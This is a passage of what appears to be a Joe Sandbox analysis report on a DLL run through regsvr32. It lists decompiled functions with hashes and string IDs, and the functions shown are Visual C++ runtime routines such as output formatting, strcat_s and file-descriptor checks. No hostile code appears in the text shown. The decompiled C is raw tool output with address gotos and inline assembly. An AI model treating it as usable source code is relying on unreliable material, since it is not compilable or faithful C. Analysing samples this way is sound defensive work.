                                                      • API String ID: 2123368286-1853640030
                                                      • Opcode ID: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                      • Instruction ID: 612b8f3a1e511721bf558c20b5ecc37bcc5fe5373454d887446b2b671354ce2d
                                                      • Opcode Fuzzy Hash: fd24ae2173ac44ea26de12f4013dd461b82e36f4d48be66e2593e9709099cfaf
                                                      • Instruction Fuzzy Hash: 2EE13A32A1DB86CAE7A09B59E8447AEB7E1F385344F604125E6CD43BB8DB7ED444CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3E6C6 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 22%
                                                      			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t224;
				signed char _t229;
				void* _t260;
				intOrPtr _t268;
				signed int _t342;
				signed int _t343;
				signed long long _t346;
				intOrPtr* _t365;
				intOrPtr* _t370;
				signed long long _t400;

				_t342 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a1220 = 7;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t342;
				goto 0xf9d3e844;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t342;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
				_t343 = E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e807;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e844;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
				if (_a1304 >= 0) goto 0xf9d3e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0xf9d3e88b;
				_t346 = _a1304;
				_a1312 = _t346;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
				_a1312 = _a1312 & _t346;
				if (_a116 >= 0) goto 0xf9d3e8d1;
				_a116 = 1;
				goto 0xf9d3e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0xf9d3e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t224 = _a116;
				_a116 = _a116 - 1;
				if (_t224 > 0) goto 0xf9d3e92f;
				if (_a1312 == 0) goto 0xf9d3e9cc;
				_a1480 = _a72;
				_a1296 = _t224 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
				_t229 = _a1296 + _a1220;
				_a1296 = _t229;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3e90e;
				_a104 = _t229;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
				if (_a104 == 0) goto 0xf9d3ea0b;
				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0xf9d3ec29;
				if (_a104 <= 0) goto 0xf9d3ec29;
				_t365 = _a64;
				_a1328 = _t365;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0xf9d3ec27;
				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
				_a1496 = _t365;
				E000007FE7FEF9D26840(_t260,  &_a120);
				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0xf9d3ebe7;
				_a1200 = 0xffffffff;
				goto 0xf9d3ec27;
				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0xf9d3eb61;
				goto 0xf9d3ec47;
				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0xf9d3ec9c;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3da75;
				if (_a1216 == 0) goto 0xf9d3ecc2;
				if (_a1216 == 7) goto 0xf9d3ecc2;
				_a1504 = 0;
				goto 0xf9d3eccd;
				_a1504 = 1;
				_t268 = _a1504;
				_a1344 = _t268;
				if (_a1344 != 0) goto 0xf9d3ed13;
				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t370;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t268 != 1) goto 0xf9d3ed13;
				asm("int3");
				if (_a1344 != 0) goto 0xf9d3ed6f;
				0xf9d2ab30();
				 *_t370 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3ed8e;
				_a1380 = _a1200;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                                      0x7fef9d3e6c6
                                                      0x7fef9d3e6cd
                                                      0x7fef9d3e6d1
                                                      0x7fef9d3e6de
                                                      0x7fef9d3e6eb
                                                      0x7fef9d3e6f7
                                                      0x7fef9d3e6ff
                                                      0x7fef9d3e70c
                                                      0x7fef9d3e717
                                                      0x7fef9d3e72a
                                                      0x7fef9d3e731
                                                      0x7fef9d3e740
                                                      0x7fef9d3e745
                                                      0x7fef9d3e74f
                                                      0x7fef9d3e762
                                                      0x7fef9d3e768
                                                      0x7fef9d3e77b
                                                      0x7fef9d3e785
                                                      0x7fef9d3e78a
                                                      0x7fef9d3e792
                                                      0x7fef9d3e7a2
                                                      0x7fef9d3e7ac
                                                      0x7fef9d3e7b1
                                                      0x7fef9d3e7b9
                                                      0x7fef9d3e7c7
                                                      0x7fef9d3e7d2
                                                      0x7fef9d3e7e1
                                                      0x7fef9d3e7e5
                                                      0x7fef9d3e7ed
                                                      0x7fef9d3e7f7
                                                      0x7fef9d3e7ff
                                                      0x7fef9d3e807
                                                      0x7fef9d3e812
                                                      0x7fef9d3e81c
                                                      0x7fef9d3e823
                                                      0x7fef9d3e82b
                                                      0x7fef9d3e835
                                                      0x7fef9d3e83c
                                                      0x7fef9d3e84d
                                                      0x7fef9d3e858
                                                      0x7fef9d3e865
                                                      0x7fef9d3e871
                                                      0x7fef9d3e879
                                                      0x7fef9d3e87b
                                                      0x7fef9d3e883
                                                      0x7fef9d3e896
                                                      0x7fef9d3e8a3
                                                      0x7fef9d3e8b8
                                                      0x7fef9d3e8c5
                                                      0x7fef9d3e8c7
                                                      0x7fef9d3e8cf
                                                      0x7fef9d3e8d8
                                                      0x7fef9d3e8e4
                                                      0x7fef9d3e8e6
                                                      0x7fef9d3e8f7
                                                      0x7fef9d3e8f9
                                                      0x7fef9d3e909
                                                      0x7fef9d3e90e
                                                      0x7fef9d3e918
                                                      0x7fef9d3e91e
                                                      0x7fef9d3e929
                                                      0x7fef9d3e934
                                                      0x7fef9d3e957
                                                      0x7fef9d3e963
                                                      0x7fef9d3e990
                                                      0x7fef9d3e9a2
                                                      0x7fef9d3e9a4
                                                      0x7fef9d3e9b8
                                                      0x7fef9d3e9c2
                                                      0x7fef9d3e9c7
                                                      0x7fef9d3e9d9
                                                      0x7fef9d3e9e5
                                                      0x7fef9d3e9f5
                                                      0x7fef9d3e9fc
                                                      0x7fef9d3ea09
                                                      0x7fef9d3ea13
                                                      0x7fef9d3ea1d
                                                      0x7fef9d3ea26
                                                      0x7fef9d3ea2f
                                                      0x7fef9d3ea3e
                                                      0x7fef9d3ea4b
                                                      0x7fef9d3ea52
                                                      0x7fef9d3ea57
                                                      0x7fef9d3ea5f
                                                      0x7fef9d3ea6a
                                                      0x7fef9d3ea71
                                                      0x7fef9d3ea76
                                                      0x7fef9d3ea7e
                                                      0x7fef9d3ea89
                                                      0x7fef9d3ea90
                                                      0x7fef9d3ea95
                                                      0x7fef9d3eaad
                                                      0x7fef9d3eabd
                                                      0x7fef9d3eada
                                                      0x7fef9d3eaf8
                                                      0x7fef9d3eb06
                                                      0x7fef9d3eb11
                                                      0x7fef9d3eb2e
                                                      0x7fef9d3eb38
                                                      0x7fef9d3eb43
                                                      0x7fef9d3eb49
                                                      0x7fef9d3eb4e
                                                      0x7fef9d3eb5a
                                                      0x7fef9d3eb71
                                                      0x7fef9d3eb7a
                                                      0x7fef9d3eb85
                                                      0x7fef9d3eb8a
                                                      0x7fef9d3eb97
                                                      0x7fef9d3ebc9
                                                      0x7fef9d3ebd8
                                                      0x7fef9d3ebda
                                                      0x7fef9d3ebe5
                                                      0x7fef9d3ebff
                                                      0x7fef9d3ec1a
                                                      0x7fef9d3ec22
                                                      0x7fef9d3ec27
                                                      0x7fef9d3ec42
                                                      0x7fef9d3ec4f
                                                      0x7fef9d3ec5a
                                                      0x7fef9d3ec77
                                                      0x7fef9d3ec82
                                                      0x7fef9d3ec8e
                                                      0x7fef9d3ec93
                                                      0x7fef9d3ec9c
                                                      0x7fef9d3eca9
                                                      0x7fef9d3ecb3
                                                      0x7fef9d3ecb5
                                                      0x7fef9d3ecc0
                                                      0x7fef9d3ecc2
                                                      0x7fef9d3eccd
                                                      0x7fef9d3ecd4
                                                      0x7fef9d3ece3
                                                      0x7fef9d3ece5
                                                      0x7fef9d3ecec
                                                      0x7fef9d3ecf1
                                                      0x7fef9d3ecf4
                                                      0x7fef9d3ed06
                                                      0x7fef9d3ed0e
                                                      0x7fef9d3ed10
                                                      0x7fef9d3ed1b
                                                      0x7fef9d3ed1d
                                                      0x7fef9d3ed22
                                                      0x7fef9d3ed28
                                                      0x7fef9d3ed31
                                                      0x7fef9d3ed4c
                                                      0x7fef9d3ed51
                                                      0x7fef9d3ed61
                                                      0x7fef9d3ed6d
                                                      0x7fef9d3ed76
                                                      0x7fef9d3ed82
                                                      0x7fef9d3eda5

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1967237116-1983305044
                                                      • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                      • Instruction ID: 6542cf9ee6a066de1e86aade3174812d6b56db97d2698e01b13d8cfaf3a7b086
                                                      • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                      • Instruction Fuzzy Hash: 20F1E872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D32D80 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 310COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                      • API String ID: 2123368286-3477667311
                                                      • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                      • Instruction ID: b03569ffd57b7167c314fdf02ed50a447cb54ce8ebbf145893a20e686b3b9740
                                                      • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                      • Instruction Fuzzy Hash: BFF13832A0DB8685EBE08B19E94476EA3E0F385795F604535D6DE83BA8DF7ED044CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D369C0 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                      • API String ID: 2123368286-1420200500
                                                      • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                      • Instruction ID: c5de73825737ff17a6e05e0685af1bba33d69fc1e3bcf908defeea2cf04d7043
                                                      • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                      • Instruction Fuzzy Hash: A9F15A32A0DB8A89FBA08B14E84576EA7E0F385395FA04535D6DD43BA8DF3ED044CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3C30D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                      • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2560055391-3497434347
                                                      • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                      • Instruction ID: 46d09667909aa5f7b215aa93bab53907018271778d835aa8b5e6ab3fef1b3364
                                                      • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                      • Instruction Fuzzy Hash: 3BC12D72A0C7C686E7B19B64E8457BEB7E4F384785F604025DAC887AA9DB7DE540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D39290 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno$_invalid_parameter
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                      • API String ID: 747159061-1442092225
                                                      • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                      • Instruction ID: caaad020489782614700f882d8602b34381ead5b625f1b09b5848be00580b1cf
                                                      • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                      • Instruction Fuzzy Hash: 28617C72A1C646CAE7909B25EC4076E72E1F380765F604725E6ED47AF9DB7EE440CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2B12B Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                      • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                      • API String ID: 1778837556-2487400587
                                                      • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                      • Instruction ID: 47630d5eafba837dbe703c3de9865bf662ca48ff4c989782bbe983e1f30135bf
                                                      • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                      • Instruction Fuzzy Hash: 7851C476608AC591E774DB18F8803EEB3E1F788394F604126EACD43AA9DB7ED154CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3C435 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 307COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                      • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 83251219-3442986447
                                                      • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                      • Instruction ID: db55a7b1c5e8f8ba017cd25dadef4e5d7f369c86b420bd695ab78b9edef6402a
                                                      • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                      • Instruction Fuzzy Hash: 49F1D87260CBC186E7B18B25E8947AEB7E4F384785F604125EACD87AA9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D407C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                      • API String ID: 2123368286-2816485415
                                                      • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                      • Instruction ID: e049fe60bfe8b909c44bc6b291fed8ca56badbc40bca4273ec712473172458ea
                                                      • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                      • Instruction Fuzzy Hash: 72617B71A1C6468AE7909B28EC4176E73E1F780354F608225E6DE57AF5D77EE440CF02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D40A20 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno$_invalid_parameter
                                                      • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                      • API String ID: 747159061-2992490823
                                                      • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                      • Instruction ID: a54d4eac887ae6c515e29e2b1085f50a353430ba1ba5378d93a4f051e541eccc
                                                      • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                      • Instruction Fuzzy Hash: 38515C71A186468AE7909B29EC8176E73E2F780758F608225E6DD476F5D77EE400CF02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3E2FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
